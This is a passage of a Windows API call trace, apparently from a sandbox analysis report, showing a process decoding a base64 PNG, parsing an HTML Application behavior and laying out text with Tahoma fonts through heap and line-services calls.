(param_1="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==") returned 0x4d9 [0228.279] CryptStringToBinaryW (in: pszString="iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", cchString=0x4c8, dwFlags=0x1, pbBinary=0x598848, pcbBinary=0x14cca4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x598848, pcbBinary=0x14cca4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0228.279] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x585980 [0228.279] GetProcessHeap () returned 0x510000 [0228.279] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x394) returned 0x598c28 [0228.279] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x598848 | out: hHeap=0x510000) returned 1 [0228.279] lstrlenW (lpString="") returned 0 [0228.279] lstrlenW (lpString="image/png") returned 9 [0228.279] lstrlenW (lpString="") returned 0 [0228.279] StrCmpNICW (lpStr1="image/pn", lpStr2="text/css", nChar=8) returned -11 [0228.279] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x394) returned 0x598848 [0228.279] lstrlenW (lpString="image/png") returned 9 [0228.279] FindMimeFromData (in: pBC=0x0, pwzUrl=0x0, pBuffer=0x598848, cbSize=0x394, pwzMimeProposed="image/png", dwMimeFlags=0x2, ppwzMimeOut=0x598688, dwReserved=0x0 | out: ppwzMimeOut=0x598688*="image/x-png") returned 0x0 [0228.279] StrCmpICW (pszStr1="image/x-png", pszStr2="text/xml") returned -11 [0228.279] StrCmpNICW (lpStr1="image/x-", lpStr2="text/css", nChar=8) returned -11 [0228.279] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x598848 | out: hHeap=0x510000) returned 1 [0228.280] IUnknown:Release (This=0x53d9c4) returned 0x9 [0228.280] IUnknown:Release (This=0x53d9c4) returned 0x8 [0228.280] IUnknown:Release (This=0x53d9c4) returned 0x7 [0228.280] CoTaskMemFree (pv=0x0) [0228.280] GetCurrentThreadId () returned 0xc4 [0228.280] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x9c2) returned 0x598fc8 [0228.280] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57d710 [0228.280] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4a8) returned 0x599998 [0228.281] IUnknown:Release (This=0x53d9c4) returned 0x6 [0228.281] IUnknown:Release (This=0x53d9c4) returned 0x5 [0228.281] IUnknown:AddRef (This=0x53d9c4) returned 0x6 [0228.281] IUnknown:Release (This=0x53d9c4) returned 0x5 [0228.319] IsCharSpaceW (wch=0x75) returned 0 [0228.319] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0228.319] IsCharSpaceW (wch=0x28) returned 0 [0228.319] IsCharSpaceW (wch=0x23) returned 0 [0228.319] IsCharSpaceW (wch=0x23) returned 0 [0228.319] IsCharSpaceW (wch=0x64) returned 0 [0228.319] IsCharSpaceW (wch=0x65) returned 0 [0228.319] IsCharSpaceW (wch=0x66) returned 0 [0228.319] IsCharSpaceW (wch=0x61) returned 0 [0228.319] IsCharSpaceW (wch=0x75) returned 0 [0228.319] IsCharSpaceW (wch=0x6c) returned 0 [0228.319] IsCharSpaceW (wch=0x74) returned 0 [0228.319] IsCharSpaceW (wch=0x23) returned 0 [0228.319] IsCharSpaceW (wch=0x41) returned 0 [0228.319] IsCharSpaceW (wch=0x50) returned 0 [0228.319] IsCharSpaceW (wch=0x50) returned 0 [0228.319] IsCharSpaceW (wch=0x4c) returned 0 [0228.319] IsCharSpaceW (wch=0x49) returned 0 [0228.319] IsCharSpaceW (wch=0x43) returned 0 [0228.319] IsCharSpaceW (wch=0x41) returned 0 [0228.319] IsCharSpaceW (wch=0x54) returned 0 [0228.319] IsCharSpaceW (wch=0x49) returned 0 [0228.319] IsCharSpaceW (wch=0x4f) returned 0 [0228.319] IsCharSpaceW (wch=0x4e) returned 0 [0228.319] IsCharSpaceW (wch=0x29) returned 0 [0228.319] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x36) returned 0x54fb68 [0228.319] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x57d728 [0228.319] IsCharSpaceW (wch=0x0) returned 0 [0228.320] StrCmpICW (pszStr1="#default#APPLICATION", pszStr2="#default#APPLICATION") returned 0 [0228.320] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54fb68 | out: hHeap=0x510000) returned 1 [0228.320] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x57d728 | out: hHeap=0x510000) returned 1 [0228.320] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0228.320] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a5e8 [0228.328] LsGetRubyLsimethods () returned 0x0 [0228.328] LsGetTatenakayokoLsimethods () returned 0x0 [0228.328] LsGetHihLsimethods () returned 0x0 [0228.328] LsGetWarichuLsimethods () returned 0x0 [0228.328] LsGetReverseLsimethods () returned 0x0 [0228.328] LsCreateContext () returned 0x0 [0228.328] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x670) returned 0x59aa68 [0228.328] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x24) returned 0x5735f8 [0228.328] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x110) returned 0x5670a8 [0228.328] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x24) returned 0x573628 [0228.328] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2e4) returned 0x59b0e0 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x5499b8 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x549bc0 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xa0) returned 0x59b3d0 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x585f48 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x549be8 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x549c10 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x549c38 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x549c60 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x400) returned 0x59b478 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x574528 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x574538 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x574548 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x574558 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x128) returned 0x59b880 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x11c) returned 0x59b9b0 [0228.329] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x108) returned 0x59bad8 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x130) returned 0x59bbe8 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x110) returned 0x5671c0 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x278) returned 0x59bd20 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc8) returned 0x59bfa0 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x190) returned 0x59c070 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x78) returned 0x522340 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xf0) returned 0x59c208 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4c) returned 0x57a5e8 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x194) returned 0x59c300 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc8) returned 0x59c4a0 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x190) returned 0x59c570 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x108) returned 0x59c708 [0228.330] LsSetModWidthPairs () returned 0x0 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x240) returned 0x59c818 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5859c0 [0228.330] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x549c88 [0228.330] LsSetBreaking () returned 0x0 [0228.331] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x271) returned 0x59ced8 [0228.331] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xa) returned 0x57d728 [0228.331] LsSetDoc () returned 0x0 [0228.331] LsCreateLine () returned 0x0 [0228.331] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0228.331] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb4) returned 0x59d158 [0228.331] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5859e0 [0228.641] LsdnFinishRegular () returned 0x0 [0228.641] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb4) returned 0x58f9a8 [0228.667] GetOutlineTextMetricsW (in: hdc=0x6e010778, cjCopy=0xd8, potm=0x14de38 | out: potm=0x14de38) returned 0xd8 [0228.667] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x50a0717 [0228.667] SelectObject (hdc=0x6e010778, h=0x50a0717) returned 0x18a002e [0228.667] GetTextFaceW (in: hdc=0x6e010778, c=32, lpName=0x14e088 | out: lpName="Tahoma") returned 7 [0228.667] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x50a0717 [0228.667] SelectObject (hdc=0x6e010778, h=0x50a0717) returned 0x18a002e [0228.667] GetTextCharsetInfo (in: hdc=0x6e010778, lpSig=0x14dff0, dwFlags=0x0 | out: lpSig=0x14dff0) returned 204 [0228.667] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x50a0717 [0228.667] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xc) returned 0x57d6f8 [0228.667] SelectObject (hdc=0x6e010778, h=0x50a0717) returned 0x18a002e [0228.667] GetFontUnicodeRanges (in: hdc=0x6e010778, lpgs=0x0 | out: lpgs=0x0) returned 0x208 [0228.667] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0228.667] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x208) returned 0x5985c8 [0228.667] GetFontUnicodeRanges (in: hdc=0x6e010778, lpgs=0x5985c8 | out: lpgs=0x5985c8) returned 0x208 [0228.667] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x50a0717 [0228.688] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x17c) returned 0x598c10 [0228.688] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x800) returned 0x59d218 [0228.688] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x50a0717 [0228.688] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb4) returned 0x58b5b0 [0228.689] LsQueryLineDup () returned 0x0 [0228.689] LsDestroyLine () returned 0x0 [0228.689] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5859e0 | out: hHeap=0x510000) returned 1 [0228.689] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0228.689] LsSetDoc () returned 0x0 [0228.689] LsCreateLine () returned 0x0 [0228.689] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0228.690] LsQueryLineDup () returned 0x0 [0228.690] LsDestroyLine () returned 0x0 [0228.690] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0228.690] LsSetDoc () returned 0x0 [0228.690] LsCreateLine () returned 0x0 [0228.690] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0228.690] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xf8) returned 0x598e58 [0228.691] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x59bfa0, Size=0x12c) returned 0x58cd10 [0228.691] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x59c4a0, Size=0x12c) returned 0x58ce48 [0228.691] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x59c070, Size=0x258) returned 0x59e228 [0228.691] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x59c570, Size=0x258) returned 0x59bfa0 [0230.102] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x58cd10, Size=0x190) returned 0x59f490 [0230.102] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x58ce48, Size=0x190) returned 0x59f628 [0230.102] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x59e228, Size=0x320) returned 0x59f7c0 [0230.102] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x59bfa0, Size=0x320) returned 0x59fae8 [0230.102] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb4) returned 0x59c598 [0230.103] LsQueryLineDup () returned 0x0 [0230.103] LsDestroyLine () returned 0x0 [0230.103] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.103] LsSetDoc () returned 0x0 [0230.103] LsCreateLine () returned 0x0 [0230.103] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.104] LsQueryLineDup () returned 0x0 [0230.104] LsDestroyLine () returned 0x0 [0230.104] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.104] LsSetDoc () returned 0x0 [0230.104] LsCreateLine () returned 0x0 [0230.104] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.106] LsQueryLineDup () returned 0x0 [0230.106] LsDestroyLine () returned 0x0 [0230.106] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.106] LsSetDoc () returned 0x0 [0230.106] LsCreateLine () returned 0x0 [0230.106] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.107] LsQueryLineDup () returned 0x0 [0230.107] LsDestroyLine () returned 0x0 [0230.107] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.107] LsSetDoc () returned 0x0 [0230.107] LsCreateLine () returned 0x0 [0230.107] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.462] GetOutlineTextMetricsW (in: hdc=0x6e010778, cjCopy=0xd8, potm=0x14de78 | out: potm=0x14de78) returned 0xd8 [0230.462] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x60a071a [0230.462] SelectObject (hdc=0x6e010778, h=0x60a071a) returned 0x18a002e [0230.462] GetTextFaceW (in: hdc=0x6e010778, c=32, lpName=0x14e0c8 | out: lpName="Tahoma") returned 7 [0230.462] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x60a071a [0230.463] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x522340, Size=0x140) returned 0x5a0c68 [0230.463] LsQueryLineDup () returned 0x0 [0230.463] LsDestroyLine () returned 0x0 [0230.463] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.463] LsSetDoc () returned 0x0 [0230.463] LsCreateLine () returned 0x0 [0230.463] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5859e0 [0230.464] LsGetRubyLsimethods () returned 0x0 [0230.464] LsGetTatenakayokoLsimethods () returned 0x0 [0230.464] LsGetHihLsimethods () returned 0x0 [0230.464] LsGetWarichuLsimethods () returned 0x0 [0230.464] LsGetReverseLsimethods () returned 0x0 [0230.464] LsCreateContext () returned 0x0 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x670) returned 0x5a1208 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x24) returned 0x573658 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x110) returned 0x5672d8 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x24) returned 0x573688 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2e4) returned 0x5a1880 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x549dc8 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x5a1b88 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xa0) returned 0x59c658 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x5861d0 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x5a1bb0 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x5a1bd8 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x5a1c00 [0230.464] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20) returned 0x5a1c28 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x400) returned 0x5a2370 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x574568 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x574578 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x574588 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x574598 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x128) returned 0x5a2778 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x11c) returned 0x5a28a8 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x108) returned 0x5a29d0 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x130) returned 0x5a2ae0 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x110) returned 0x5673f0 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x278) returned 0x5a2c18 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc8) returned 0x59bfa0 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x190) returned 0x5a2e98 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x78) returned 0x522340 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xf0) returned 0x5a3030 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4c) returned 0x57a640 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x194) returned 0x5a3128 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc8) returned 0x5a32c8 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x190) returned 0x5a3398 [0230.465] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x108) returned 0x5a3530 [0230.466] LsSetModWidthPairs () returned 0x0 [0230.466] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x240) returned 0x5a3640 [0230.466] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585980 [0230.466] LsSetBreaking () returned 0x0 [0230.466] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x271) returned 0x5a3d00 [0230.466] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xa) returned 0x57d590 [0230.466] LsSetDoc () returned 0x0 [0230.466] LsCreateLine () returned 0x0 [0230.466] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.466] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb4) returned 0x5a3f80 [0230.467] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb4) returned 0x5a4040 [0230.467] LsQueryLineDup () returned 0x0 [0230.467] LsDestroyLine () returned 0x0 [0230.467] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.467] LsdnFinishRegular () returned 0x0 [0230.467] LsQueryLineDup () returned 0x0 [0230.467] LsQueryLineCpPpoint () returned 0x0 [0230.467] LsDestroyLine () returned 0x0 [0230.467] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5859e0 | out: hHeap=0x510000) returned 1 [0230.467] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.467] LsSetDoc () returned 0x0 [0230.467] LsCreateLine () returned 0x0 [0230.467] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.468] LsQueryLineDup () returned 0x0 [0230.468] LsDestroyLine () returned 0x0 [0230.468] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.468] LsSetDoc () returned 0x0 [0230.468] LsCreateLine () returned 0x0 [0230.468] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.469] LsQueryLineDup () returned 0x0 [0230.469] LsDestroyLine () returned 0x0 [0230.469] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.469] LsSetDoc () returned 0x0 [0230.469] LsCreateLine () returned 0x0 [0230.469] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.469] LsQueryLineDup () returned 0x0 [0230.469] LsDestroyLine () returned 0x0 [0230.469] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.469] LsSetDoc () returned 0x0 [0230.469] LsCreateLine () returned 0x0 [0230.469] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.470] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x5859e0 [0230.470] LsSetDoc () returned 0x0 [0230.470] LsCreateLine () returned 0x0 [0230.470] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.470] LsQueryLineDup () returned 0x0 [0230.470] LsDestroyLine () returned 0x0 [0230.470] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.470] LsdnFinishRegular () returned 0x0 [0230.470] LsQueryLineDup () returned 0x0 [0230.470] LsQueryLineCpPpoint () returned 0x0 [0230.470] LsDestroyLine () returned 0x0 [0230.471] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5859e0 | out: hHeap=0x510000) returned 1 [0230.471] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.471] LsSetDoc () returned 0x0 [0230.471] LsCreateLine () returned 0x0 [0230.471] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.471] LsQueryLineDup () returned 0x0 [0230.472] LsDestroyLine () returned 0x0 [0230.472] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0230.472] 